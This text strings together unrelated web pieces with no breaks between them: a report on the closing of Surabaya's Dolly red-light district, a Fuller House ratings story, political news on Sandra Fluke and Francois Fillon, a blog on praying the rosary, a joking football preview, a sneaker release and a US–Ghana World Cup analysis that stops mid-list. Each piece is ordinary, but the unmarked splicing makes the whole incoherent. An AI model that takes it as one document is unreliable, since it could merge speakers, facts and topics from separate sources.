It was nearly midnight and Pokémon was growing testy . We were standing at the entrance to Dolly , Southeast Asia 's largest red-light district . It 's a sprawling complex of colorfully named brothels in the Indonesian city of Surabaya , and this was supposed to be its last night of business . My photographer and I landed in town 11 hours earlier , arriving to flooded roads and stifling heat .
Surabaya is Indonesia 's second-largest city , a storied port city of more than 3.1 million people . But word travels fast among the pimps , sex workers , and alley sprinters of Gang Dolly . Pokémon , a pimp dressed in flip-flops and a weathered field cap like Fidel Castro on a beach holiday , heard that we had met with his opposition—a local village chief—and denied us access to the district 's people .
`` Leave here now , or we can not guarantee your safety , '' Pokémon uttered , arms crossed , his eyes averted .
Brothel workers union leader and pimp Ari Saputro , known as “ Pokémon ” speaks against the closure of the red-light district .
Pokémon blocked the entrance to his headquarters . Around the corner touts called out to men , tempting them with a final night of drinking , singing and fucking in the neon-drenched brothels that lined Dolly 's winding alleyways .
`` Get out of here , '' Pokémon demanded as the circle of pimps closed in . `` You are banned ! Banned from Dolly ! ''
Indonesia 's `` city of heroes '' is known for its resilience and gruff demeanor . Surabaya was home to one of the nation 's fiercest battles against the British in the immediate aftermath of World War II and is the birthplace of Sukarno , the country 's fiery independence leader and rabble-rousing demagogue . The city 's name is a portmanteau of the Javanese words for shark , `` soro , '' and crocodile , `` boyo , '' and a statue depicting the two creatures locked in eternal combat graces the city 's center .
The Surabaya of today still grabs headlines in Indonesia . It 's the base for the nation 's largest Muslim organization , the Nahdlatul Ulama , home to the region 's largest red-light district and features the country 's worst-run zoo—the infamous `` zoo of death . ''
It 's also undergone something of a renaissance under the guidance of its unwavering reformist mayor Tri Rismaharini—famously known as `` Ibu Risma '' or `` Mother Risma '' in Indonesia . She is Indonesia 's first directly elected female mayor and a cool breeze in the doldrums of Indonesian politics . She plants trees , builds parks , picks up litter and gave the city 's poor free healthcare .
Rismaharini then set her sights on one of the city 's last great blemishes , the massive brothel complexes of Dolly and neighboring Jalan Jarak . The district spans dozens of city blocks and employs roughly 1,500 sex workers , as well as hundreds of pimps . It is thought to have been named after a Dutch madam , and has operated with impunity for decades in the world 's largest Muslim-majority country , where prostitution is illegal but widely tolerated .
Rismaharini gave Dolly until June 18th to shut down . We arrived that morning on a flight from the Indonesian capital , landing at the nearby town of Sidorarjo where a company owned by the country 's whale-jawed tycoon Aburizal Bakrie punched a hole through the earth 's crust and inundated a town in volcanic mud .
Our cab slogged through the city 's flooded streets to arrive at the entrance to Dolly . The street was dusty . Banners reading `` We need to live . Do not impoverish us '' hung above the narrow street . Someone had thrown a rock through the window of the Putri Ayu II brothel .
A child stands in front of “ New Barbara 22 , ” one of the brothels located on Gang Dolly .
Dolly in the daytime looked much like any other street in Indonesia , only with about 10 times more unlit storefronts . Pimps were napping inside brothels and food sellers vigorously stirred steaming woks of fried rice . Children loitered on benches , smiled , and shouted an obligatory “ Hello , mister ! ” at us .
At the end of the block was the headquarters for the Sex Workers ' Front ( FPL ) , a loosely affiliated union of pimps and prostitutes standing in opposition to plans to shutter Dolly . Pokémon was one of the first men to greet us . He launched into a well-rehearsed speech that elicited nods from a small crowd of men smoking kretek , sweet-smelling clove cigarettes that crackle as they burn , a fixture throughout Indonesia .
“ These people , the sex workers , they are all working here to make a living , ” Pokémon said . “ They are working to feed their families . Do not treat them as if they are a lower people ! ”
Rismaharini would deny the claims , explaining that she was trying to raise these women out of an unfortunate situation . The city was offering each sex worker roughly $ 430 and a few classes on simple skills like sewing or cooking as for a fresh start . She was clear in her argument , drafting sex work as a means of oppression when announcing the closure .
Muhammed Ridwan , the village chief of the neighboring Putat Jaya Timur , agreed with the sentiment . Ridwan said he understood the concerns of the pimps and sex workers , but explained that he placed a greater importance on the future of the community 's children—kids who were exposed to prostitution on a daily basis .
“ The fact is , I am fighting for these people living around Dolly , '' Ridwan said `` For older people , Dolly is n't so much an issue , but young children can memorize everything . They are exposed to people changing partners and drinking ( alcohol ) . ”
Dolly took on a more sinister air at night—the atmosphere was that of a debauched bazaar . Men crawled the narrow streets , passing by aging brothels painted Easter egg pink by blazing neon lights . Bored women in skin-tight miniskirts thumbed smart phones on the cheap pleather sofas in brothels like “ New Barbara 22 ” and “ Madona. ” Riotous dangdut music blared from blown-out stereo speakers as children weaved through the crowd . The scene seemed like it was business as usual , although with a more palpable tension as the next day , a nearby policeman told us , about 900 police personnel would be deployed to make sure the district shut down .
Pimps and prostitutes rose early to hit the streets in protest the morning of June 18 . Men and women with covered faces blockaded Dolly 's winding roads with motorbikes and benches . They diverted traffic , waved flags banged pots and pans and marched through the streets like a militia . They confronted hardline Islamists who dared to break their ranks .
Despite the show of force , Rismaharini declared the district officially shutdown that evening , but Dolly merely heard it and winked back , not taking it all that seriously .
Next time we would see Dolly would be one week later , and it would be a bona fide ghost town . Despite its reputation for sin and excess , the district observed the Muslim fasting month of Ramadan and seemingly shuttered its doors on its own volition . Every brothel front had one thing in common : a white sign that read , “ Vacation : Respect the holy month of Ramadan . ”
We made our way to one of the only places that was still inhabited and would let us in . It was a modest brothel named `` Rose , '' a five-bedroom house located on a sleepy side street near Jarak owned by a weathered woman named Rokhani . The brothel 's speaker system was packed away . The neon beer lights were switched off . She brought us out a tray of cold Extra Joss—a painfully sugary energy drink that looks vaguely radioactive—and sat down at a plastic chair . Her daughter wandered in and out of the house , burping and comforting her baby .
Rokhani , has been running the Rose brothel for 27 years . She worries she wo n't be able to make a living if Dolly is shuttered .
Rokhani raised her tattooed eyebrows and looked around the dimly lit room . The 54-year-old broke down in tears as she mourned the potential loss of Rose—a brothel she owned for 27 years .
“ It used to be very crowded , ” Rokhani said as she rhythmically tapped her heart . “ There was karaoke every night . The ( girls ) had a lot of guests . With the closure rumors , the number of guests has drastically declined , ” she said tiredly . “ Maybe one or two guests ( come per night ) . My girls usually served five guests . I have seven girls ; every night I had 35 to 40 guests .
“ We shut down the business two days before Ramadan . We will open again after Lebaran ( the end of Ramadan ) . I still reject the closure—the whole village has agreed to reject it . I will still be working . ”
Rokhani recalled a story from a nearby district , in which some former sex workers accepted Rismaharini 's compensation and used the money to buy and sell rice . But once word got around that the women were former prostitutes , their checkered past turned off potential buyers .
“ Who would want to buy ( rice ) if the seller is a prostitute ? ” Rokhani said . “ The women would say ‘ Do n't buy it , the seller is a prostitute . ' So the girls were forced to work again . ”
Dina , a 32-year-old sex worker from Malang who lives at Rokhani 's house , brought us into her bedroom and spoke to us wearing a large hat and a face mask to shield her identity . A pack of Marlboro Menthol Lights sat next to several bottles of perfume and tubes of lipstick .
Dina came to Surabaya after divorcing her husband . “ It 's the economy—I am poor and the economy pressured me , ” she said . “ Somebody asked me to work in Surabaya , so here I am . ”
But as far as her 16-year-old daughter knows , Dina works in a store . “ I 'm sad to work in a prostitution complex , ” she said . “ But where else can I make money ? ”
Dina said that she used to earn 500,000 rupiah per day at the brothel and that five million in compensation will not be nearly enough for her to support herself and her daughter .
“ I want the government to give me five million rupiah , and then give me a cigarette kiosk , ” she said . “ I want them to give me the capital to start the business—not only the money , but also the products , so I can develop the business later . Five million rupiah is not enough . ”
And for Rokhani herself , the future looks grim .
“ I am old . I ca n't do other work besides being a pimp , '' she said . `` I have kids , I do n't have a husband . I have two biological children and three foster children… It 's going to kill us if we ca n't work . ”
Aside from concerns about income , activists are now worried that shuttering the complex will only spread out the more dangerous parts of the sex trade . Before , non-profits like Yayasan Abdi Asih could find the city 's sex workers in one place , making it easy to offer the men and women aid and track efforts to curb HIV rates .
“ With Dolly being localized , it was easier for everybody because we can collect data on their health care , ” said Irmasanthi Danadharta , an outreach worker at Yayasan Abdi Asih . “ We can see how many sex workers use condoms , how many do n't use condoms . It helps us to prevent the spread of HIV and AIDS . But with Dolly closing , it will be hard to for us track them again . ”
Rokhani took immense pride in her brothel 's oversight of her workers ' wellbeing .
“ This place is really healthy , ” she said . “ Every Thursday , the girls got injections and cleaned up—if they had a disease , it would be treated immediately… I have been working here for over 20 years , and not a single one of my girls had syphilis . They are completely clean . ”
Dina was not oblivious to her career 's inherent risks . “ If they close down the complex , HIV can spread , ” she said . “ I had a friend that was infected with HIV . She was taken to Soetomo Hospital . But she returned home and she eventually died . ”
According to Abdi Asih director Liliek “ Vera ” Sulistyowati , HIV rates in Surabaya had steadily declined since 2012 , with reported figures in and around Dolly dropping from 110 cases to only 14 in two years ' time . Vera is concerned that efforts to keep the complex closed will reverse this trend .
“ If Dolly closes , there will be no control , ” she said .
Arman Dzidzovic contributed to this article .
Follow Ethan on Twitter : @ eharfenist
Fuller House Season 2 Took A Big Ratings Drop For Netflix By Laura Hurley Random Article Blend Fuller House was a surprise hit for Netflix when its first season debuted back in February of 2016 , and it got a renewal order for a second season almost right away . Unfortunately , it seems that Season 2 was much less of a success in its first weekend than Season 1 . Ratings may have dropped by more than 50 % for Season 2 . Netflix is notoriously stingy when it comes to releasing ratings and viewership for analysis , but ratings measurement company Symphony Advanced Media reports numbers that fell significantly from Season 1 to Season 2 . If Symphony 's report is accurate , the first three days of Fuller House Season 2 only averaged a 2.01 in the 18 - 49 age demographic , which is a 62 % drop from the 5.30 average in the first three days of Season 1 . Additionally , the Season 2 premiere only won a 3.32 rating in 18 - 49 , which equals a 67 % drop from the Season 1 premiere . Additionally , Symphony reports that a mere 9 % of the viewers who tuned in to the Season 1 premiere in the first three days also tuned in to the Season 2 premiere when it hit the web on December 9 , which could indicate that the huge numbers for Season 1 were inflated by the ratings for the premiere . According to Variety , the ratings drop between Episodes 1 and 2 in Season 1 is similar to the ratings drop from Season 1 and Season 2 . The folks who enjoyed the series premiere enough to watch the whole first season may be the only ones who sat down to binge the second season in its first weekend on Netflix . Of course , ratings in the 18 - 49 age demographic are n't nearly as important for Netflix as they are for broadcast television . High demo ratings on broadcast mean that advertisers are willing to pay more to air commercials during episodes . Since Netflix does n't use commercial breaks the way that other TV outlets do , low demo ratings are n't necessarily deal-breakers when it comes to renewing shows . The drop from Fuller House Season 1 to Season 2 is discouraging , but a core group of loyal fans could be enough to keep the show in production for the indefinite future . Fuller House still gets plenty of buzz on social media . Besides , there are plenty of reasons why the numbers for the first three days of Seasons 1 and 2 are so different , and they 're not all disastrous . For one thing , the incredible ratings for the Season 1 premiere may have been bolstered by the novelty factor of a Full House spinoff . Even folks who were never going to watch 13 episodes of family friendly fun on Netflix may have wanted to check out the premiere for the sake of nostalgia . For another thing , viewers may not feel as inclined to rush into a Season 2 as they were a Season 1 . It 's possible that the average ratings for Fuller House Season 2 will be more impressive once more than the first three days are taken into account . Fans do n't need to panic just yet that Fuller House may get the ax . If you have n't checked it out yet , you can catch all 13 episodes of Fuller House Season 2 streaming on Netflix now . Take a look at our midseason TV premiere schedule to see what you can watch on the small screen in the not-too-distant future . How Hulu Could Save the Marvel Netflix Shows Blended From Around The Web Facebook
Back to top
Reproductive rights advocate Sandra Fluke , who rose to prominence during the 2012 presidential election when she testified in favor of the necessity of contraception coverage for women and was attacked by conservative radio host Rush Limbaugh , has been flirting with a congressional bid for weeks . On Tuesday , Fluke took one step toward making her interest in a seat in Congress official .
Fluke filed paperwork with the California Democratic Party in search of its endorsement to replace retiring Rep. Henry Waxman ( D-CA ) . The Washington Post confirmed that Fluke will appear on a Democratic Party ballot over the weekend and may become the party 's standard bearer to replace the departing 20-term congressman .
RELATED : Christopher : Sandra Fluke Crushes Conservative Who Equates Contraception to Alec Baldwin 's Anti-Gay Slurs
While Fluke has not announced her congressional campaign yet or filed her require paperwork with the Federal Election Commission , her early moves are unmistakably those of a potential candidate . If she runs , Fluke will have to face a former Los Angeles mayoral candidate and a longtime state senator , both of whom are both interested in Waxman 's safely Democratic congressional seat .
h/t The Washington Post
[ Photo via AP ]
— —
> > Follow Noah Rothman ( @ NoahCRothman ) on Twitter
Have a tip we should know ? tips @ mediaite.com
PARIS ( AP ) — Conservative candidate Francois Fillon refused to quit France 's roller-coaster presidential race Wednesday despite receiving a summons to face charges of faking government-paid parliamentary jobs for his family .
Calling the investigation a “ political assassination , ” Fillon urged his supporters to “ resist ” and said he would leave it up to French voters to decide his fate . Once a front-runner in the election race , Fillon 's chances have slipped since the probe was opened in January .
Cracks started to emerge in Fillon 's Republicans party hours after his announcement , with the resignation of a top ally . But it 's unclear whether Fillon 's decision will dramatically alter the electoral landscape , where the polls are dominated now by far-right National Front leader Marine Le Pen and centrist independent candidate Emmanuel Macron .
The top two presidential vote-getters in France 's April 23 ballot will head to a presidential runoff on May 7 .
Fillon held an emergency party meeting Wednesday after receiving the legal summons and postponed a campaign stop , prompting media speculation that he could quit the race .
“ I will not surrender , ” he told reporters at his headquarters later . “ I will not withdraw . ”
Fillon denied all allegations and said legal procedures were not properly followed in the probe , which he called unprecedented and unacceptable during a presidential election campaign . He said he was summoned for questioning March 15 “ with the goal of being given preliminary charges . ”
The court summons was widely expected after the financial prosecutor 's office pushed the case to a higher level Friday , opening a formal judicial inquiry .
The alleged fake jobs that Fillon gave his family are especially shocking to many voters because of Fillon 's promise to cut government spending and his clean-cut image . The investigative weekly Le Canard Enchaine reported that payments were made to his wife , Penelope Fillon , and two of their five children that totaled more than 1 million euros ( $ 1.1 million ) over many years .
Fillon initially said he would withdraw from the race if he was charged , but later said he was determined to let voters judge him instead of investigators .
“ France is greater than my errors , ” he said Wednesday .
After a preliminary investigation opened Jan. 25 , the financial prosecutor 's office decided Friday to launch a formal judicial inquiry . The list of potential charges now includes misappropriation of public funds , abuse of public funds and influence trafficking .
The investigation is going unusually quickly by French standards — one of the reasons that Fillon claims it is politically driven to torpedo his candidacy .
The financial prosecutor 's office was created in part to speed up the often-protracted French judicial process , and the justice minister insisted in a statement Wednesday that investigating judges act independently of politics .
Le Pen is also facing legal investigations involving European Parliament assistants and party financing , which she calls baseless and politically motivated .
The Republicans party has no clear alternative besides Fillon . The runner-up in the party 's first-ever primary , center-leaning Alain Juppe , has said he would not run in Fillon 's place .
Bruno Le Maire , who also lost to Fillon in that primary , quit his position on Fillon 's campaign team Wednesday , saying he could no longer back Fillon because the candidate had backpedaled on his promise to withdraw from the race if he was charged .
Fillon has not been charged yet , but the prosecutors apparently expect he will be .
“ I believe in keeping your word . It is vital to the credibility of politics , ” Le Maire said .
But Bernard Debre of the Republicans rallied to Fillon 's side Wednesday , dismissing questions about whether the party should replace its presidential candidate .
“ Well , 50 days ahead of ( the election ) ? And by whom ? ” Debre asked .
Denise Mermut , an 18-year-old first-time voter walking near Fillon 's Paris campaign headquarters , was unequivocal .
“ Fillon should quit politics . It 's shameful , ” she said . “ This is not normal , when you see what happens in other democratic countries in cases like this . ”
Mermut plans to vote for far-left candidate Jean-Luc Melenchon .
Zach El Maataoui , a young voter who plans to cast a blank ballot in the presidential election , said he was not surprised .
“ The guy just wants power . … Politicians are all scam artists , ” he said .
As part of this year-long effort to better understand what we mean when we talk about following Jesus , called My Jesus Project , I 've been making a more concerted effort to pray every day . Even though my tendency is to focus on more silent , contemplative reflection , I 've actually taken on a number of prayers that I do several times each , over a half-hour period or so .
Some , like the Lord 's Prayer ( Our Father/God , who art in heaven… ) , the Jesus Prayer ( Jesus Christ , son of God , have mercy on me , a sinner ) , the Serenity Prayer ( Lord , grant me the serenity to accept the things I can not change… ) and the Prayer of St. Francis ( Lord , make me an instrument of your peace… ) , I also practice the “ Hail Mary. ” Not only that , but I use a rosary to go through my prayers .
I 've shared this with some folks , and inevitably someone is surprised by this . I 'll get something like , “ I did n't know you 're Catholic , ” or “ Why pray to Mary ? After all , she 's not actually God . ”
Or is she ?
Not that I think she personally was “ God with skin on , ” like we sometimes talk about Jesus . But like her son , I do tend to think that she point us toward God , which seemed to be the one of the most important things Jesus did . In fact , when I 'm asked what 's different about Jesus , as compared with other prophets and miracle workers in the Bible , I tend to respond that he , unlike others who preceded him in the biblical narrative , was more like the needle of a compass , pointing us in a common direction , rather than making himself the “ X marks the spot , ” or the ultimate destination .
For me , Mary does this as well . There 's no story about her in the Gospels that suggests anything other than total devotion to God and to Jesus . In fact , in her conversation with God about becoming Jesus ' mother sounded much like Jesus prayer to God in the garden of Gethsemane , just before he was handed over to be crucified .
Both offered humble submission : not my will , God , but yours be done .
Also , like many of us , I struggle with the pervasively male God imagery that dominates the protestant religious landscape . Until very recently , all protestant churches focused principally – if not exclusively – of God the Father . But for me , at least , this feels woefully incomplete . If God is alpha and omega ( beginning and ending ) , and in God , there is no distinction between male or female , why are we so hell-bent on defining God as such in our religious practices ?
Not only that , but if you 're like me , you have a fairly complicated relationship with “ father ” being synonymous with “ love. ” Some may argue that our less-than-perfect father figures beg re-imagining , and that God the Father offers that opportunity . But for me , understanding God as all-encompassing and unconditional love calls out for a maternal understanding of the Divine . And mary offers this : a path to the Divine Feminine that I have sought for so many years .
As for the rosary , I 'm sure I do n't use it “ correctly ” according to Catholic doctrine , but it grounds me , helps me focus , gives me a sort of prayer “ routine , ” and connects me more physically to my prayer practice . In experiencing this grounding embodiment , it occurs to me that , in breaking free from the hierarchy of Catholicism in the Protestant Reformation , we threw out many proverbial babies with the Catholic bathwater .
This is yet another example of how I have found a new spiritual future by reaching back many centuries into the past . And as someone who wrestles with the very idea of some metaphysical existential “ other ” somewhere out there , operating above and beyond humanity in some way , these ancient icons , practices and methods of engaging in spiritual discipline connect me to a more full , more embodied and even a more transcendent experience of God than I 've ever had in my faith journey in the past .
So thanks , Mary for helping lead the way to humble acceptance and a more perfect experience of selfless , unconditional love . I owe you one .
Hello . Welcome to `` Foe '' Rensics , the most valuable educational resource on the world wide web . Since we covered East Carolina last year , it makes no sense to do the whole thing over again . So , of course , we will , except with a modified landing .
1 . Tell me what happened last week .
A. I feel like the only way I can effectively recap Saturday night is through song :
Everything is indeed , awesome
Seriously , I was so pumped up , I told Mrs. Fifth Fuller at least two dozen times last week that we were going to beat anOSU and then we played like that . WE were the team that took a punch in the 4th quarter and then threw one right back , HARDER . WE were the team that MADE the gut punch interception to end any hope of a comeback . For the first time in a long time , I felt confident the entire game that we would respond to any adversity and perform and those boys did n't let me down . I 'm so happy right now .
2 . Remind me how that affects the season predictions ?
A . While a couple of folks ( Mason , Bill ) also correctly predicted that we would beat anOSU , I consider myself in sole possession of first place since my predicted losses ( 0 ) is still accurate .
3 . How modest of you . So , East Carolina again . What 's up with them ?
A . Well , since we already talked about the history of ECU , I thought it would be nice to explore their roster , but from an academic perspective . Since the East Carolinians embrace their pirate identity , I 'm going to focus on those players that are in their plundering and pillaging program . As repeatedly stressed by our omnipotent but benevolent overlords at NCAA , these athletes are STUDENTS FIRST , and we should recognize those that are excelling on AND off the field , as well as offshore . Let 's take a look at those ECU football players most likely to raise the bar ( and the Jolly Roger ) once they graduate from those hallowed halls .
4 . Uh , okay . That 's cool , I guess . Who 's first ?
A. Christian Matau : Favorite Pirate - Blackbeard
His beard looks better once he braids the fireworks in
A redshirt freshman offensive lineman , he comes in very raw , with his go-to move of lighting his beard on fire only really usable once or twice a season1 . However , once OL coach Brandon Jones told him to treat QB Shane Carden like his secret pirate booty that he was to protect from the Spanish Main , his instincts took over and he became a force to be reckoned with .
5 . Aw , that 's nice , respects the founder . Anyone else ?
A. Blake Kemp : Favorite Pirate - Jake of the Neverland Pirates
WHAT THE HELL ARE YOU GOING TO CUT WITH A WOODEN SWORD , BLAKE ?
Some question Blake 's commitment to the pirate lifestyle , particularly since he looks up to a kid that does n't actually ever do pirate things . He just hangs out on an island , dressing like he 's in a pirate boy band and hindering the older pirates that are trying to actually steal booty .
6 . Also , I heard Jake has a vicious molasses allergy and drinking rum would jack him up bad .
A . Will Foxx : Favorite Pirate - One Eyed Willie
Coach Ruff just convinced Will to stop wearing an eye patch on the field
I 'm pretty sure that One Eyed Willy was only his choice because they have the same name . Who wants to be like a pirate that gets himself trapped in a cave ? I do n't care how much treasure you have , if you 're dumb enough to get locked in a cave and spend all your time building elaborate booty traps instead of figuring a way out of the damn cave , you are not worthy of respect .
7 . You mean booby traps ?
A . THAT 'S WHAT I SAID . BOOTY TRAPS . Anyway , One Eyed Willie was a terrible pirate and Will Foxx should feel bad .
8 . Strong take . Anyone else ?
A. Tre Robertson : Favorite Pirate - Dread Pirate Roberts
Apparently all of the Dread Pirate Roberts rock ponytails
Tre is actually a legacy , his last name deriving from the fact that he is descended from the second Dread Pirate Roberts2 . To this day , Tre 's family carries a deep pride in their roots and strong aversion to Princes and Humperdinks and the offensive lineman is noticeably more effective when coaches tell him opposing players are Florinese .
9 . If Luther Maddy had six fingers , Robertson might actually be able to block him .
A. Montese Overton : Favorite Pirate - My 3 year old in doggy pirate pajamas
See ? Dog never smiles . Neither does Montese .
While he seems small , linebacker Overton has long admired my kid 's ability to rain down destruction far beyond his physical gifts . Overton takes that mentality onto the field , chasing down quarterbacks and running backs with a single-minded ferocity , like they stole his favorite lego man . Fortunately , Overton has yet to `` Suarez '' someone and take a bite out of them on the field , but it may just be a matter of time before he follows in his idol 's footsteps .
Unfortunately , due to UN sanctions , ECU has disassociated itself from it 's historical recruiting hotbed of East Africa , something that has definitely taken a toll on their Pirating program . Unfortunately for the young men I 've highlighted above , that 's also negatively impacted their internship program .
10 . Have they gotten any Fullers since last year ?
A . No , they 're completely screwed .
11 . Any other roster notes ?
A . While they lost their Marquis from last year , they still boast a Maurice , Marquez , Montese , Marquise and added a Malik , Messiah , and a Markel to keep Coach Ruff confused as hell . They also have a dude named Worth Gregory ( I did not get that backwards ) who has a national championship ring he earned at Alabama as a walk on backup punter , showing you can reach lofty goals without actually doing ANYTHING . Finally , they have Elizabeth City State transfer Bladen Gatling who was born at a gun show .
12 . What about visiting Greenville ?
A . If you 'll recall , we went through your dining options in Greenville last year . Of course , do n't use them this weekend because the game is in Blacksburg . HOWEVER . If you 're going , you 'll need something to do besides eat , watch football3 and walk the plank , eh , me hearty ? So let 's look at their touristy stuff !
...
Well , it turns out that there is n't really much to do in Greenville , NC . In fact , if you go to the Greenville TripAdvisor page , it actually takes you to the Greenville , SC page which , if you can ignore the fact that it 's in the wrong Carolina , is actually bigger and has more stuff to do . Like a zoo ! So let 's go there instead ! Here 's a review from Subha dora D :
Know it all fat keeper staff . No wonder they killed an elephant . The younger admin girls are ok though.They want us to feed crackers to goats ! The Gud it 's a small zoo , but not worth it .
I feel like maybe Subha has some anger issues . I do n't understand exactly who she 's angry at . The zoo ? A keeper with a weight problem ? Multiple keepers with weight problems ? A dead elephant ? Is she implying that the elephant was ASKING FOR IT ? But I do like that she throws in a # NotAllZooEmployees note , so that was nice .
13 . I 'll be sure to check it out . But do n't you normally review two things ?
A . Yes ! And DID YOU KNOW - that there are now Google Reviews of universities ? And why would n't there be ? Why would n't you want to offer people the ability to anonymously review a four year higher education institution that you have no way of verifying that they ever attended or even visited ? Maybe because it leads to reviews like this from A Google User that read like they were written by a bot :
This amazing institution has brought me success in the business world and in life . The campus is beautiful and the school spirit is unbelievable . This school wants you to succeed and to help others along the way .
Good thing we have some clearly hand-crafted , lovingly written reviews , like this one from A ( nother ) Google User :
Road block
Helpful .
14 . Seriously . Can we end on a high note ?
A . Always ! I took a minute to peruse the official @ EastCarolina Twitter account and here are some highlights :
Athletic Director Jeff Compher is legally blind4 and they played a mean joke by telling him he was sitting in a sauna .
Actively promoting their successful and vibrant alumni pirating community
RT @ InnerPirate : Fall 2014 Family Weekend dates are set : Aug. 30-31 . Tell mom/dad/g'ma now . Hotel space is limited . pic.twitter.com/6ZBPlVe8Il— East Carolina Univ . ( @ EastCarolina ) March 25 , 2014
Apparently Boba Fett went there ? It kind of makes sense , bounty hunters are sort of like pirates . Also , the 'hook hand ' move kind of looks like you 're showing off the booger you just picked .
15 . Back to the Hokies . How are our FAINTs looking ?
A . Well . Despite the fact that he is apparently made partially of adamantium , Brewer got knocked around enough to force him into two more interceptions . What 's more , despite Kendall and Brandon staying close enough to their receivers that in a non-football situation they would have had charges filed against them , they have yet to record an interception . Though several people asked , we can not count Kyshoen 's nor Donovan Riley 's interceptions towards the FAINT count . Cutting corners is simply not the Fuller way5 . So , this week we stand at 3 FAINTs , well above our season goal of -2 .
16 . Well that 's disappointing . What about the RAGE MATCH ?
A . We 're going with a dual award . This award was initially inspired by Dadi Nicolas going HAM on Pitt and he has returned to reclaim the title with two sacks , an additional tackle for loss and FIVE QB hurries . However , I could not help but notice that , on top of a sack , an additional tackle for loss , a pass breakup , two QB hurries and 10 total tackles , Deon Clarke was going freaking nuts after seemingly every play . Seriously , if there was one player that I could compare my own admittedly bonkers actions Saturday night against , it was Clarke . I loved watching it .
17 . What should I be watching for this weekend ?
A . Assuming you do n't get sacked by Dadi Nicolas on the way into the stadium :
If our cornerbacks are going to stop just breaking up all the passes and finally INTERCEPT SOME
If a second game against Bud Foster 's defense is going to permanently scar QB Shane Carden
If our offensive line can do everyone a favor and keep Michael Brewer 's uniform clean this week
If it 's possible for Juice and Shai to BOTH go over 200 yards rushing in the same game
Thanks for joining us ! Next week we 'll be back with an exciting preview of Georgia Tech as well as a recap of my weekend watching football with my FSU cousin who is sort of insane .
1And it burns the hell out of your face . I heard . From someone else that is n't me .
2Not Westley , nor the one that captured him , but the one before THAT guy . I think .
3On tv , of course , because there 's no game there
4No he is n't
5Unless it 's on the way to rock J.T . Barrett or Vad Lee , then a Fuller will very much cut a corner
adidas D Lillard 1 “ Forestry ” Release Date
It seems as though adidas has truly enjoyed working with Damian Lillard as the D Lillard 1 has arrived in a variety of different hues ranging fromthe distinct PDX airport carpet to Damian 's former AAU team .
The latest iteration that will soon be available at retailers is the adidas D Lillard 1 “ Forestry ” which relies on a notable upper that is very reminiscent of the forestry theme it was named after , further complimented by a barrage of hues such as yellow , red , brown and black . In addition , this model features a plaid motif along the underlay , while resting atop of a speckled midsole and black outsole .
Lastly , a notable Damian Lillard freestyle is within the shoe :
Made in the city of roses they 're dodging rain drops
Funny how the city on fire a couple names hot
Keepin ' Portland weird they gon na love me when all the fame stops
I do it for the people while knocking down end of game shots
If you 'd like to cop the adidas D Lillard 1 “ Forestry , ” then head over to select adidas retailers on August 7th as the latest Lillard colorway will retail for $ 105 .
adidas D Lillard 1 “ Forestry ”
Release Date : August 7 , 2015
Price : $ 105
`` One more such victory and we will be utterly undone . ''
– Pyrrhus of Epirus after the Battle of Asculum
Pyrrhus was fighting the Romans , leading a collection of Greek city-states against the nascent Mediterranean superpower . His point was simple : The losses suffered in victory were so great , so substantial , that there would be no army to field , no more battles to fight – let alone win – after his victory at Asculum .
The US , without Jozy Altidore for what looks like the rest of the tournament and without Matt Besler for hopefully something shorter than that , ca n't afford many more personnel losses , even if they turn into wins .
But that 's a worry for another day . For now , it 's three points thanks to a hard-earned , bunker-and-pray 2-1 win over Ghana :
1 . Beasley on an island out wide on the left .
There was a lot of shade being thrown at DaMarcus Beasley on Twitter , as if it was his fault that the Ghanaians kept bombing down his flank in 2-v-1s and whipping in crosses .
You see the math , right ? When it 's 2-v-1 on the flank , the best thing you can do as a fullback is coax the opposition into hopeful benders , which is exactly what Beasley did , save for the one time he literally fell on his rear as Christian Atsu cut inside and tried to create danger that Besler snuffed out .
That moment of play just encouraged people ( including some smart folks who should know the game better ) to pile on . But considering he was going 1-v-2 , he did well because – and I 'm going all caps here because I do n't trust the weight of mere words – NOBODY GOT BEHIND HIM . The US can deal with crosses all day , but you do n't want Geoff Cameron , Besler – most likely John Brooks now – or especially Omar Gonzalez having to come out and meet attackers wide .
They hit 30 crosses from open play – seven more than anyone else this tournament ! That 's David Moyes territory .
Is that 15 crosses now for Ghana ? 16 ? It 's like they came into the game already out of ideas . — Michael Caley ( @ MC_of_A ) June 16 , 2014
The US invited Ghana forward , and wanted them to play thoughtlessly . Jermaine Jones pushe up the left real high to hunt the ball , and it worked .
2 . Pulling the plug out of the central midfield
The US only made danger from the run of play when they were able to pull the plug on Ghana 's central midfield and force the central defense to play 1-v-1 . Sulley Muntari was absolutely culpable on the Clint Dempsey goal , the way he edged toward the ball – a hyper-aggressive defensive stance – instead of cutting off the run of Dempsey . This is what I tweeted about pregame :
Quoting myself from 5 tweets ago : `` US needs to pull Rabiu out of the hole and go at the Ghanaian central pairing . '' — Matthew Doyle ( @ MLSAnalyst ) June 16 , 2014
And here 's the play in question :
Only thing I got wrong was that it was Muntari instead of Mohammed Rabiu ( sorry to throw my arm out patting myself on the back ) .
What was interesting about this play is that this is the exact problem the dual pivot ( two deep-lying central midfielders , which is what Muntari and Rabiu are ) is supposed to prevent – it 's supposed to clean up in front of the central pairing , giving them extra protection . But because neither player in that spot is a pure d-mid , they have to play a hybrid role , switching hats in mid-flight . So sometimes you attack the ball , and sometimes you go with the player . When you attack the ball , you have to get it or you 're giving your opponent a free run at the backline .
Muntari , as experienced in big games as any player on the field , got his lines crossed for a split second . Dempsey punished him .
MLS 1 , Serie A 0
3 . My worry with Fabian Johnson
Ghana spent way more time attacking up Beasley 's side than Fabian Johnson 's for some reason – maybe they did n't watch the tape of the Nigeria game or something . Johnson is electric going forward , and a `` must-start '' for me . When he gets involved in the attack , he can elevate the US to that `` another level '' Klinsmann has loved to talk about since Day 1 .
But he 's an inattentive defender off the ball , which is why he 's bounced around quite a bit on the field in his club career . On Andre Ayew 's goal , he was at fault :
“ @ MLSAnalyst : Fabian Johnson absolutely skinned . This is known . Shockingly inattentive from him. ” Exactly . Not Howard 's fault . — Dante Washington ( @ DanteWashington ) June 16 , 2014
This is where Cristiano Ronaldo and Mario Götze live . They will watch tape . Johnson was good all day in the challenge , but he has to be better on tracking and hand-offs .
Bonus thoughts :
7 . I 'm not ready to blame Klinsmann 's training routine for the pair of muscle injuries the US suffered . But there certainly seems to a bit of a pattern being built up .
Remember , part of Brian Straus 's article in 2013 focused on how Klinsmann overtrains players in camp – and that article included ( anonymous ) quotes from guys who are in Brazil . Philip Lahm , in his autobiography , said much the same thing , pointing out that Klinsmann prefers to focus on fitness over tactics or ball work :
